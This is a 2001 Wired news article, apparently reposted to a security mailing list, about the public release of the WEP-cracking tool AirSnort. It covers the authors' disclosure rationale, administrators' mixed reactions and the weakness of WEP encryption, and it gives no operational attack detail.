http://www.wired.com/news/wireless/0,1382,46187,00.html By Michelle Delio 2:20 p.m. Aug. 20, 2001 PDT Wireless networks are a little less secure today with the public release of "AirSnort," a tool that can surreptitiously grab and analyze data moving across just about every major wireless network. When enough information has been captured, AirSnort can then piece together the system's master password. In other words, hackers and/or eavesdroppers using AirSnort can just grab what they want from a company's database wirelessly, out of thin air. AirSnort's abilities aren't groundbreaking - security experts know all too well that wireless networks can be easily accessed and monitored by outsiders. But a fully featured tool to facilitate password-grabs wasn't readily available until this past weekend, when AirSnort was released on the Internet. "AirSnort certainly ups the ante in the sense that with this tool, your 'encrypted wireless net' can be quickly and easily breached," said Randy Sandone of Argus, a security company. "Once AirSnort breaks the encryption, you're basically hosed. A malicious hacker can read any packet traveling over the network, gather information, passwords -- you name it." Wireless networks transmit information over public airwaves, the same medium used by television, radio and cell phones. The networks are supposed to be protected by a built-in security feature, the Wired Equivalent Privacy system (WEP) -- also known as the 802.11b standard -- which encrypts data as it is transmitted. But WEP/802.11b has proved to be quite crackable. And that's exactly why AirSnort was publicly released, said AirSnort programmers Jeremy Bruestle and Blake Hegerle. They hope that AirSnort will prove once and for all that wireless networks protected only by WEP are not secure. "Yes, AirSnort can be used as a cracking tool, but it can also be used as a really big stick in an argument over the safety of WEP," Hegerle said. "We felt that the only proper thing to do was to release the project," Bruestle said. "It is not obvious to the layman or the average administrator how vulnerable 802.11b is to attack. It's too easy to trust WEP. Honestly, there is a lot of work involved in hardening a wireless network. It's easy to be complacent. AirSnort is all about opening people's eyes." Added Sandone: "Perhaps its release will prompt wireless vendors to significantly enhance the encryption of their products. And hopefully users will come to understand that encryption (regardless of how it is used) is not a panacea." "Some people overhype the power of encryption, and others put too much faith in its 'mathematical precision.' It clearly has its value, but it shouldn't be the only security mechanism in use." "Weaknesses in the Key Scheduling Algorithm of RC4," a recently published paper by Scott Fluhrer, Itsik Mantin and Adi Shamir, outlined a way to learn the master key to the WEP encryption system, which would allow an intruder to pose as a legitimate user of the network. Adam Stubblefield, a Rice University undergraduate who was working as a summer intern at AT&T Labs, tested that exploit (with the permission of the network's administrator) and was able to pull up the network's master password in just under two hours. Stubblefield published his research on the Internet, but did not release the program he used to access AT&T's wireless network. If the software that he wrote to grab passwords were published, Stubblefield told a reporter from The New York Times, anyone with a basic knowledge of computers and a wireless network card could easily crack many wireless networks. "Basically I read the paper and wondered if the attack would actually work in the real world, and how hard it would be to implement," Bruestle said. "I am the CEO of a small security firm, Cypher42, and I wanted to know just how difficult or easy it would be to implement the attack, so we could properly advise clients on 802.11b security." Another tool, WEPcrack, was released on the Internet around the same time as AirSnort, but WEPcrack is still considered an alpha release, a work in progress. Bruestle and Hegerle's AirSnort is a beta release, a designation that indicates a program is not quite ready for primetime, but is further along feature and stability-wise than alpha. Bruestle said he and Hegerle had a basic working version of AirSnort after less than 24 hours of programming time. Bruestle said he has received many e-mails about AirSnort, some in favor of the public release of the tool, others accusing him of adding to the malicious hackers' arsenal. "Many of the people who have e-mailed me about AirSnort are sysadmins who thanked me for giving them a way to convince management that WEP really is insecure," Bruestle said. "Of course, I have gotten a number of flame mails too, comparing the release of AirSnort to 'giving guns to children.' I understand the viewpoint of those who believe dangerous information should be hidden, but I disagree." Hegerle and Bruestle said that they believe that many people did not understand the academic nature of Fluhrer, Mantin and Shamir's paper, and may not understand how vulnerable wireless systems are. "It was beyond even my humble attempts to understand (the paper's) full depths," Bruestle said. "The implications of a tool like AirSnort are much harder to deny than the paper it was based on." AirSnort uses a completely passive attack: An AirSnort user needs only a Linux-operated computer with a wireless network card, and access to whatever wireless network he or she wishes to crack. Many wireless networks allow amazingly easy access to unauthorized users, as some have discovered when their laptops suddenly connect to the Internet when they are in or near a building that has a wireless network. "I've been able to connect to networks when standing outside of businesses, hospitals or Internet cafs that offer the service," said Mark Denon, a freelance technology writer. "You can jump in and use the network to send e-mail or surf the Net, and often it's quite possible to access whatever information is moving across the network. It's very easy to piggyback onto many wireless networks, and some people make a game of driving or walking around a city and seeing how many networks they can jump into." "A wireless card in the machine that's running AirSnort does not send out any data or actually talk with any of the other machines on the network," said Hegerle. "It simply listens to all the other traffic, so it doesn't matter if the network allows unauthorized access, as none of the other machines on the network will even know anyone is listening," said Hegerle. The amount of time required to piece together a password with AirSnort depends on a number of factors, Bruestle said, but mostly depends on the amount of network traffic and "luck." "On a highly saturated network, AirSnort can usually collect enough packets to guess the key in three or four hours. If the network is very low traffic, it can take days to get enough data," Bruestle said. "Since the attack is based on probability, the actual number of packets required to guess a given key varies from key to key, sometimes significantly." AirSnort monitoring does not have to be all done in one session, though. "Five hours one day and five the next works out to be about the same as 10 hours in a row," Bruestle said. Systems administrators have mixed reactions over the release of AirSnort. "Granted, this program will hammer the truth into people's heads about the insecure nature of any wireless network protected only by WEP," said Gerry Kaufman, a medical network and systems consultant. "But releasing this tool also allows a lot of people access to networks who couldn't have cracked them before. I'm really torn between advocating open access to information, and keeping tools like AirSnort out of the hands of kids with too much free time on their hands." Kaufman said the "only good thing" that could come from AirSnort's release is its use for proving to "those who approve the expenditures" that wireless networks need stronger protection. Hegerle and Bruestle suggest that wireless network users look into other end-to-end forms of encryption, such as Virtual Private Networks (VPNs) to protect data going over wireless networks. "While this requires more work, the false sense of security WEP offers is worse than no security at all," Bruestle said. "Quite simply, I won't be happy until there are no people trusting their data to WEP as it now exists," Hegerle said. "There are several possible ways to change WEP, and I would like to see a new dialog begin, one that looks for a replacement to the badly designed WEP we are now stuck with." Under development are new versions of WEP/802.11b that will include stronger security features. But the new standards won't be released until mid-2002 at the earliest. - ISN is currently hosted by Attrition.org To unsubscribe email majordomoat_private with 'unsubscribe isn' in the BODY of the mail.
This archive was generated by hypermail 2b30 : Tue Aug 21 2001 - 04:09:16 PDT